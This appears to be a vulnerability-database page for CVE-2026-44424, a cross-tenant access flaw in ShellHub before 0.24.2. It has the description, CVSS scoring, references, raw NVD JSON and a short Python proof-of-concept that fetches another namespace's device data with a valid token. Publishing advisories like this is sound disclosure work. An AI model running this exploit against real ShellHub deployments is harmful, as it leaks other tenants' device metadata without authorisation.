CVE-2026-44424

Description

ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller's namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace. This vulnerability is fixed in 0.24.2.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ShellHub < 0.24.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2026-44424: ShellHub IDOR
# Attacker needs a valid JWT or API Key
target_url = "https://<shellhub-domain>/api/devices/<target_device_uid>"
headers = {
    "Authorization": "Bearer <attacker_valid_token>",
    "Content-Type": "application/json"
}

response = requests.get(target_url, headers=headers)

if response.status_code == 200:
    print("[+] Exploit Successful! Leaked Device Data:")
    print(response.json())
else:
    print(f"[-] Request failed with status code: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44424
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44424
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44424/
[4] VulDB https://vuldb.com/cve/CVE-2026-44424
[5] https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f
[6] https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44424", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:44.257", "lastModified": "2026-05-14T16:44:55.820", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller's namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace. This vulnerability is fixed in 0.24.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f", "source": "[email protected]"}, {"url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}